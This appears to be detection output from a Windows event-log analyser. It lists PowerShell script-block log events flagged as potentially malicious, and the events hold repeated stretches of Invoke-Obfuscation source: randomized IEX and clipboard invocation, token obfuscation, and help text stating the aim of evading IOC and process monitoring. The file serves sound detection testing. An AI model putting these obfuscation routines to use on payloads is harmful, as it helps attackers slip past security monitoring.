(Get-Random -Input $ExecContextVariables) $RandomInputVariable = (Get-Random -Input @('$Input','${Input}')) # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $RandomInputVariable If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # If $NoExit flag is defined in calling function then default to - stdin syntax. It will cause errors for other syntax options. If($NoExit) { $InvokeOption = '-' } # Set $PowerShellStdIn to value of $InvokeOption. $PowerShellStdIn = $InvokeOption # Random case of $PowerShellStdIn. $PowerShellStdIn = ([Char[]]$PowerShellStdIn.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random PowerShell Stdin operation through the appropriate token obfuscators. If($PowerShellStdIn -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $PowerShellStdIn syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellStdIn.Contains(""$Char"")) { $PowerShellStdIn = $PowerShellStdIn.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($PowerShellStdIn.Contains('""')) { $PowerShellStdIn = $PowerShellStdIn.Replace('""','\""') } Return $PowerShellStdIn } Function Out-RandomClipboardInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command stored in the clipboard. Invoke-Obfuscation Function: Out-RandomClipboardInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomClipboardInvokeSyntax generates random PowerShell syntax for invoking a command stored in the clipboard. This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent/grandparent process if passed to powershell.exe via clipboard. .EXAMPLE C:\PS> Out-RandomClipboardInvokeSyntax . ( \""{0}{1}\"" -f( \""{1}{0}\""-f 'p','Add-Ty' ),'e' ) -AssemblyName ( \""{1}{0}{3}{2}\""-f ( \""{2}{0}{3}{1}\""-f'Wi','dows.Fo','em.','n'),(\""{1}{0}\""-f 'yst','S'),'s','rm' ) ; (.( \""{0}\"" -f'GV' ) (\""{2}{3}{1}{0}{4}\"" -f 'E','onCoNT','EXEC','UTi','XT')).\""Va`LuE\"".\""inVOK`Ec`OMmANd\"".\""inVOKe`SC`RIpT\""(( [sYsTEM.WInDOwS.foRMS.ClIPbOard]::( \""{1}{0}\""-f (\""{2}{1}{0}\"" -f'XT','tTE','e'),'g').Invoke( ) ) ) ;[System.Windows.Forms.Clipboard]::( \""{1}{0}\""-f'ar','Cle' ).Invoke( ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via clipboard for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set variables necessary for loading appropriate class/type to be able to interact with the clipboard. $ReflectionAssembly = Get-Random -Input @('System.Reflection.Assembly','Reflection.Assembly') $WindowsClipboard = Get-Random -Input @('Windows.Clipboard','System.Windows.Clipboard') $WindowsFormsClipboard = Get-Random -Input @('System.Windows.Forms.Clipboard','Windows.Forms.Clipboard') # Randomly select flag argument substring for Add-Type -AssemblyCore. $FullArgument = ""-AssemblyName"" # Take into account the shorted flag of -AN as well. $AssemblyNameFlags = @() $AssemblyNameFlags += '-AN' For($Index=2; $Index -le $FullArgument.Length; $Index++) { $AssemblyNameFlags += $FullArgument.SubString(0,$Index) } $AssemblyNameFlag = Get-Random -Input $AssemblyNameFlags # Characters we will use to generate random variable name. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate random variable name. $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate paired random syntax options for: A) loading necessary class/assembly, B) retrieving contents from clipboard, and C) clearing/overwritting clipboard contents. $RandomClipSyntaxValue = Get-Random -Input @(1..3) Switch($RandomClipSyntaxValue) { 1 {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag PresentationCore"" $GetClipboardContentsOption = ""([$WindowsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 2 { $LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag System.Windows.Forms"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 3 { $LoadClipboardClassOption = (Get-Random -Input @('[Void]','$NULL=',""`$$RandomVarName="")) + ""[$ReflectionAssembly]::LoadWithPartialName('System.Windows.Forms')"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } default {Write-Error ""An invalid RandomClipSyntaxValue value ($RandomClipSyntaxValue) was passed to switch block for Out-RandomClipboardInvokeSyntax.""; Exit;} } # Generate syntax options for invoking clipboard contents, including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $GetClipboardContentsOption If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Set final syntax for invoking clipboard contents. $PowerShellClip = $LoadClipboardClassOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption # Add syntax for clearing clipboard contents. $PowerShellClip = $PowerShellClip + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ClearClipboardOption # Run through all relevant token obfuscation functions except Type since it causes error for direct type casting relevant classes in a non-interactive PowerShell session. $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Command' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'CommandArgument' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Variable' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'String' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'RandomWhitespace' # For obfuscated commands generated for $PowerShellClip syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($PowerShellClip.Contains('""')) { $PowerShellClip = $PowerShellClip.Replace('""','\""') } Return $PowerShellClip }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag PresentationCore"" $GetClipboardContentsOption = ""([$WindowsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 2 { $LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag System.Windows.Forms"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 3 { $LoadClipboardClassOption = (Get-Random -Input @('[Void]','$NULL=',""`$$RandomVarName="")) + ""[$ReflectionAssembly]::LoadWithPartialName('System.Windows.Forms')"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } default {Write-Error ""An invalid RandomClipSyntaxValue value ($RandomClipSyntaxValue) was passed to switch block for Out-RandomClipboardInvokeSyntax.""; Exit;} } # Generate syntax options for invoking clipboard contents, including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $GetClipboardContentsOption If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Set final syntax for invoking clipboard contents. $PowerShellClip = $LoadClipboardClassOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption # Add syntax for clearing clipboard contents. $PowerShellClip = $PowerShellClip + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ClearClipboardOption # Run through all relevant token obfuscation functions except Type since it causes error for direct type casting relevant classes in a non-interactive PowerShell session. $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Command' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'CommandArgument' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Variable' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'String' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'RandomWhitespace' # For obfuscated commands generated for $PowerShellClip syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($PowerShellClip.Contains('""')) { $PowerShellClip = $PowerShellClip.Replace('""','\""') } Return $PowerShellClip }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Invoke-Obfuscation { <# .SYNOPSIS Master function that orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents. Interactive mode enables one to explore all available obfuscation functions and apply them incrementally to input PowerShell script block or script path contents. Invoke-Obfuscation Function: Invoke-Obfuscation Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Show-AsciiArt, Show-HelpMenu, Show-Menu, Show-OptionsMenu, Show-Tutorial and Out-ScriptContents (all located in Invoke-Obfuscation.ps1) Optional Dependencies: None .DESCRIPTION Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments and common parent-child process relationships. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER ScriptPath Specifies the path to your payload (can be local file, UNC-path, or remote URI). .PARAMETER Command Specifies the obfuscation commands to run against the input ScriptBlock or ScriptPath parameter. .PARAMETER NoExit (Optional - only works if Command is specified) Outputs the option to not exit after running obfuscation commands defined in Command parameter. .PARAMETER Quiet (Optional - only works if Command is specified) Outputs the option to output only the final obfuscated result via stdout. .EXAMPLE C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -Quiet C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit -Quiet .NOTES Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [String] $ScriptPath, [String] $Command, [Switch] $NoExit, [Switch] $Quiet ) # Define variables for CLI functionality. $Script:CliCommands = @() $Script:CompoundCommand = @() $Script:QuietWasSpecified = $FALSE $CliWasSpecified = $FALSE $NoExitWasSpecified = $FALSE # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['ScriptBlock']) { $Script:CliCommands += ('set scriptblock ' + [String]$ScriptBlock) } If($PSBoundParameters['ScriptPath']) { $Script:CliCommands += ('set scriptpath ' + $ScriptPath) } # Append Command to CliCommands if specified by user input. If($PSBoundParameters['Command']) { $Script:CliCommands += $Command.Split(',') $CliWasSpecified = $TRUE If($PSBoundParameters['NoExit']) { $NoExitWasSpecified = $TRUE } If($PSBoundParameters['Quiet']) { # Create empty Write-Host and Start-Sleep proxy functions to cause any Write-Host or Start-Sleep invocations to not do anything until non-interactive -Command values are finished being processed. Function Write-Host {} Function Start-Sleep {} $Script:QuietWasSpecified = $TRUE } } ######################################## ## Script-wide variable instantiation ## ######################################## # Script-level array of Show Options menu, set as SCRIPT-level so it can be set from within any of the functions. # Build out menu for Show Options selection from user in Show-OptionsMenu menu. $Script:ScriptPath = '' $Script:ScriptBlock = '' $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:ObfuscatedCommand = '' $Script:ObfuscatedCommandHistory = @() $Script:ObfuscationLength = '' $Script:OptionsMenu = @() $Script:OptionsMenu += , @('ScriptPath ' , $Script:ScriptPath , $TRUE) $Script:OptionsMenu += , @('ScriptBlock' , $Script:ScriptBlock , $TRUE) $Script:OptionsMenu += , @('CommandLineSyntax' , $Script:CliSyntax , $FALSE) $Script:OptionsMenu += , @('ExecutionCommands' , $Script:ExecutionCommands, $FALSE) $Script:OptionsMenu += , @('ObfuscatedCommand' , $Script:ObfuscatedCommand, $FALSE) $Script:OptionsMenu += , @('ObfuscationLength' , $Script:ObfuscatedCommand, $FALSE) # Build out $SetInputOptions from above items set as $TRUE (as settable). $SettableInputOptions = @() ForEach($Option in $Script:OptionsMenu) { If($Option[2]) {$SettableInputOptions += ([String]$Option[0]).ToLower().Trim()} } # Script-level variable for whether LAUNCHER has been applied to current ObfuscatedToken. $Script:LauncherApplied = $FALSE # Ensure Invoke-Obfuscation module was properly imported before continuing. If(!(Get-Module Invoke-Obfuscation | Where-Object {$_.ModuleType -eq 'Manifest'})) { $PathTopsd1 = ""$ScriptDir\Invoke-Obfuscation.psd1"" If($PathTopsd1.Contains(' ')) {$PathTopsd1 = '""' + $PathTopsd1 + '""'} Write-Host ""`n`nERROR: Invoke-Obfuscation module is not loaded. You must run:"" -ForegroundColor Red Write-Host "" Import-Module $PathTopsd1`n`n"" -ForegroundColor Yellow Exit } # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 # Build interactive menus. $LineSpacing = '[*] ' # Main Menu. $MenuLevel = @() $MenuLevel+= , @($LineSpacing, 'TOKEN' , 'Obfuscate PowerShell command ') $MenuLevel+= , @($LineSpacing, 'STRING' , 'Obfuscate entire command as a ') $MenuLevel+= , @($LineSpacing, 'ENCODING' , 'Obfuscate entire command via ') $MenuLevel+= , @($LineSpacing, 'LAUNCHER' , 'Obfuscate command args w/ techniques (run once at end)') # Main\Token Menu. $MenuLevel_Token = @() $MenuLevel_Token += , @($LineSpacing, 'STRING' , 'Obfuscate tokens (suggested to run first)') $MenuLevel_Token += , @($LineSpacing, 'COMMAND' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'ARGUMENT' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'MEMBER' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'VARIABLE' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'TYPE ' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'COMMENT' , 'Remove all tokens') $MenuLevel_Token += , @($LineSpacing, 'WHITESPACE' , 'Insert random (suggested to run last)') $MenuLevel_Token += , @($LineSpacing, 'ALL ' , 'Select choices from above (random order)') $MenuLevel_Token_String = @() $MenuLevel_Token_String += , @($LineSpacing, '1' , ""Concatenate --> e.g. <('co'+'ffe'+'e')>"" , @('Out-ObfuscatedTokenCommand', 'String', 1)) $MenuLevel_Token_String += , @($LineSpacing, '2' , ""Reorder --> e.g. <('{1}{0}'-f'ffee','co')>"" , @('Out-ObfuscatedTokenCommand', 'String', 2)) $MenuLevel_Token_Command = @() $MenuLevel_Token_Command += , @($LineSpacing, '1' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'Command', 1)) $MenuLevel_Token_Command += , @($LineSpacing, '2' , ""Splatting + Concatenate --> e.g. <&('Ne'+'w-Ob'+'ject')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 2)) $MenuLevel_Token_Command += , @($LineSpacing, '3' , ""Splatting + Reorder --> e.g. <&('{1}{0}'-f'bject','New-O')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 3)) $MenuLevel_Token_Argument = @() $MenuLevel_Token_Argument += , @($LineSpacing, '1' , 'Random Case --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 1)) $MenuLevel_Token_Argument += , @($LineSpacing, '2' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 2)) $MenuLevel_Token_Argument += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('Ne'+'t.We'+'bClient')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 3)) $MenuLevel_Token_Argument += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'bClient','Net.We')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 4)) $MenuLevel_Token_Member = @() $MenuLevel_Token_Member += , @($LineSpacing, '1' , 'Random Case --> e.g. '",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Invoke-Obfuscation { <# .SYNOPSIS Master function that orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents. Interactive mode enables one to explore all available obfuscation functions and apply them incrementally to input PowerShell script block or script path contents. Invoke-Obfuscation Function: Invoke-Obfuscation Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Show-AsciiArt, Show-HelpMenu, Show-Menu, Show-OptionsMenu, Show-Tutorial and Out-ScriptContents (all located in Invoke-Obfuscation.ps1) Optional Dependencies: None .DESCRIPTION Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments and common parent-child process relationships. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER ScriptPath Specifies the path to your payload (can be local file, UNC-path, or remote URI). .PARAMETER Command Specifies the obfuscation commands to run against the input ScriptBlock or ScriptPath parameter. .PARAMETER NoExit (Optional - only works if Command is specified) Outputs the option to not exit after running obfuscation commands defined in Command parameter. .PARAMETER Quiet (Optional - only works if Command is specified) Outputs the option to output only the final obfuscated result via stdout. .EXAMPLE C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -Quiet C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit -Quiet .NOTES Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [String] $ScriptPath, [String] $Command, [Switch] $NoExit, [Switch] $Quiet ) # Define variables for CLI functionality. $Script:CliCommands = @() $Script:CompoundCommand = @() $Script:QuietWasSpecified = $FALSE $CliWasSpecified = $FALSE $NoExitWasSpecified = $FALSE # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['ScriptBlock']) { $Script:CliCommands += ('set scriptblock ' + [String]$ScriptBlock) } If($PSBoundParameters['ScriptPath']) { $Script:CliCommands += ('set scriptpath ' + $ScriptPath) } # Append 